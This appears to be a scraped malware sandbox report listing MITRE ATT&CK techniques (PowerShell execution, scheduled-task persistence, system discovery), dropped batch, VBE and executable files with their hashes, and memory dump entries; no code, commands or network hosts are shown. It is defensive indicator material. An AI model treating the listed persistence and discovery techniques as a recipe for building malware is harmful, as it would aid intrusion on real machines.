MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spoolsv.exe.log

Filesize
1KB

MD5
3c93e1d75c4f1682ef0f33b9c0759623

SHA1
b725fdf914847d4896aec8e97d7535bed90ed02a

SHA256
6905fbb07def20c266499860d66336405ee8a44de59fc7da1ef879ab4bc08b93

SHA512
31bbda359f7184f2b45fe4775b4c9b58a1720183964006557292fff8412d179379893816dc760a2b433bdbbb23c9fadaf9975a821734a891db7cbc34b410b5cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\2juDPxCKYX.bat

Filesize
221B

MD5
a4b7b046e88f7a89482a776a2b2bc9f6

SHA1
eaed3f2f9533a4fb31f5e0d41119867dd59d7ff4

SHA256
8888bb73bc60cdd425555309dcc3075af64bdf60c52e35ffdbf9dcdf5c9df827

SHA512
b4f319aef237756588158de121ba33cab5db77e620fe1a96487340c5950b97b58c4f30598a085cd0a14eb639363dc444e77fa35dd313aa7b20cc54d54caed0df

Download Submit
C:\Users\Admin\AppData\Local\Temp\3IMqqsTTOd.bat

Filesize
173B

MD5
4b34af56745fbacf82930f33b7eb54b3

SHA1
bd30b8762fe3691ab0e32c45ff34308fe07594c2

SHA256
7f79b08b4c2a7bf02bac4b6f3215c87069dc83113d6bdf85f1824f61267f18ff

SHA512
95bcb2fcaa6d8b0792bbeb6376a786d5e2a80e7fc4fa562267027defd71b474eda7dc8a61513103a48a666f65719bc48562f853ebcd464e777d4d7e4332506a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat

Filesize
173B

MD5
d02e7fa81355f6f84b28fb52993bc5a1

SHA1
3edb14ac43c697ed1d43219c966ab3dc9a2b490d

SHA256
50f81cad81319469c0b79bf8959db7ef04072aa958d6f95e6bf69785d8be3988

SHA512
55553b0bd05eb03a00b3899b03259fb6fa55a2c09ba612fc955125a63d9bc63344d1350ca704a65dc3e3482486cac68e737379f887fda85c4f5ad713d421d9cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Q5hzjQRwNJ.bat

Filesize
173B

MD5
4900bef3c2dc3253fb13be9270f1e906

SHA1
81082783b0deee646f7644fcbd7f68fd3e760134

SHA256
d42185f54fb52b2db8d754e25f19d17a6fc0494adf1536f6f865d414c3cf2630

SHA512
b16965795adb45e9677a469b0e64f39359224e2a4b55ea33b4fab867fa142144707cd1eccb056dc93b1da1b06c78fa932067cf457687b068e44eabb8a085dd58

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZPsODb7c4Z.bat

Filesize
221B

MD5
6501c1ad63c0a8a67c0848231b155f77

SHA1
f45268286b85a0285a4cd6dbe857e92947cd297a

SHA256
8f37faca5eff2d15512f79744e92a0058b8db13d9913bb625533b30877b6e8ec

SHA512
dad791b8290535c1b87e0212f166dea7e28c76336ad044a36181a1a2351579c657c9ceb35e212696b4e20b33fede03e4cb5ab2c2f53f4f728da5d5c50685f30e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aa5pldvj.ep2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aehWhM7TGU.bat

Filesize
221B

MD5
45580d4ffc0bc65483667fd9c584d9d2

SHA1
4499b6bd002640b33a54cbeaf98c55a109263d58

SHA256
f4df5aabeffd73e3e1d2ebfb01db5d850d1dfb3fd59ade7d03d9a083caf48bc4

SHA512
af2960933f7c9bab22c2de46af9294b5c07c42389ea552d86779fe732523ed38e1707eac967f38c44145a79ad5296e84637e6891808aab75d2e345077446a435

Download Submit
C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat

Filesize
173B

MD5
5308b6755ef7f32185cd68096603e44e

SHA1
d081803f2924a71d6e2225641566070b6ae59d92

SHA256
70f3d9d1b7e24ab32a61d028830a47a9b2e834e85f59eb741a44294b628e5546

SHA512
55010d98f8c9be8e7116d34a934c03508c6a938ecb2461050ef32347b085c38067d07038bf43f92a5787531bdbf6eb247ec6d848fe4b7f5b5d9658304af96543

Download Submit
C:\Users\Admin\AppData\Local\Temp\mr8meW3tpm.bat

Filesize
173B

MD5
b5bee6e1db1b1dcaf76c17a44b5fb586

SHA1
a2ce952b494d4f3679ddb2632e0097fa828fb898

SHA256
22d4bba79fafbc671fb9cfb37fb7fb42039fa5d7a4eb19b0282fc884c102704a

SHA512
efafb9907d302ce54096190f191638915c3f53fab52e1d7750e8dc5223957cdc810a872a34cd7c2e69fc996440339b8b3f78056b08b9358a84145f27a139265c

Download Submit
C:\Users\Admin\AppData\Local\Temp\nSTk4tfYD6.bat

Filesize
173B

MD5
3ea392ede9ad2513e2eedea9c55c3998

SHA1
9e3d5e53a818496b6438844509ce395e728e9e04

SHA256
84144262d85c210ec64016842e625c6f9d654fe4862c42f1357cef0780e747ff

SHA512
b9441acdd72cb86463808e0db55d36e63c4210c29420a59af54672a40f8aadbd42b2d1ad53355c9404c2b358921867a4e8e0a5b713f5aa238cd82e1bcba6d864

Download Submit
C:\Users\Admin\AppData\Local\Temp\o1vNVowh3C.bat

Filesize
173B

MD5
b5d69db9834ae8be919a4a47e916020b

SHA1
e3a8d026cd6f358466e2ed5e73dbef05bceee15f

SHA256
a13e309074c40b68e0faab299d98d1674905ccc526f22236ad1eea2fcf624545

SHA512
62fb4dcc27c2f4abdfc1c7c42932f81d210e6b739c923168fd12ee90af1ebb952ff8ee7f2fdfe568e3b30a8fdee3d0b7fd91ac8482cc782316ce256a55d0cb45

Download Submit
C:\Users\Admin\AppData\Local\Temp\ogJsYefPP1.bat

Filesize
173B

MD5
0efd1a5b5150c1281623e6b7eea6f6d0

SHA1
9c49a08a3e95462a275e1181f0405a080e48bfa2

SHA256
59ba98b081121cfb4b0af6b30eaa1300349906cac7fc5a5111aee1b3a8809047

SHA512
58319ab6f7467793f7b31b3cdac523e4e2f71d35f72d611ce0cd5a6b2c9bc77f9fcbab0f5a3a8293066202cec0a02d252a3b0efb79aff9727a0529b2187c08c4

Download Submit
C:\portsurrogateFontCrt\BlockcontainerWin.exe

Filesize
2.4MB

MD5
b3f6318c958712d0c78b5a969ee2efd1

SHA1
abf4cf8782f366a10df36ff706afeaffd07df514

SHA256
e2d2a557cf97f4d81a7d476d3fb5e43405f6e79fe266032dd3d8650d6b81d846

SHA512
67f987ca27548c3ef21e7c27990653e1443b0a761262ef2351bf1fd670903e7652e1a215a206b2fc197dba33a661e762f410ab63b1605a2571c1872c75c78912

Download Submit
C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat

Filesize
85B

MD5
2f3c3a6c3a477313d6ab3d03f90be8c2

SHA1
1afe24a9f578c49b35c34855441455ebe4f04369

SHA256
ecff07d881b76f45aa8142eb1cb8a1e21f8f1f51217968cc623aa7ff4dfb4aee

SHA512
fe223a07eb4b7c8799ecdaf4e149f8d3f902648bddaa55efa28095db2320ff796dd017b3059cba6282e0e085c7b30aa2a4202105e48c7da6c40b19484c3c2d8f

Download Submit
C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe

Filesize
211B

MD5
0b67bf20e24eac268c690e05e9e59711

SHA1
2768696c3fff8aade04325ead3ad4366e9393084

SHA256
88907a441f365c8d0ec4f523f0f38f97434528ca151b928cf8f1c29db80afe8a

SHA512
64d956b71dc25615b8deea4ce5d8dc3f2b79e7ca6dfa289fb5c73f3fe63e14698a739ddcbb3d257569342d6afe543aa76837f30499405097b356cdaa17b05fcd

Download Submit
memory/1668-56-0x0000023D78E50000-0x0000023D78E72000-memory.dmp

Filesize
136KB

Download
memory/2176-13-0x00000000008F0000-0x0000000000B64000-memory.dmp

Filesize
2.5MB

Download
memory/2176-22-0x000000001BBE0000-0x000000001BBF8000-memory.dmp

Filesize
96KB

Download
memory/2176-25-0x000000001D260000-0x000000001D788000-memory.dmp

Filesize
5.2MB

Download
memory/2176-20-0x000000001B780000-0x000000001B790000-memory.dmp

Filesize
64KB

Download
memory/2176-17-0x000000001BBC0000-0x000000001BBDC000-memory.dmp

Filesize
112KB

Download
memory/2176-27-0x000000001B790000-0x000000001B79E000-memory.dmp

Filesize
56KB

Download
memory/2176-15-0x000000001B770000-0x000000001B77E000-memory.dmp

Filesize
56KB

Download
memory/2176-18-0x000000001BC30000-0x000000001BC80000-memory.dmp

Filesize
320KB

Download
memory/2176-24-0x000000001BC00000-0x000000001BC12000-memory.dmp

Filesize
72KB

Download
memory/2176-12-0x00007FFCD4B43000-0x00007FFCD4B45000-memory.dmp

Filesize
8KB

Download
memory/2176-33-0x000000001CDC0000-0x000000001CE0E000-memory.dmp

Filesize
312KB

Download
memory/2176-31-0x000000001B7A0000-0x000000001B7AC000-memory.dmp

Filesize
48KB

Download
memory/2176-29-0x000000001CD50000-0x000000001CD68000-memory.dmp

Filesize
96KB

Download
memory/3092-134-0x000000001C890000-0x000000001CA39000-memory.dmp

Filesize
1.7MB

Download
memory/3984-151-0x000000001C620000-0x000000001C722000-memory.dmp

Filesize
1.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.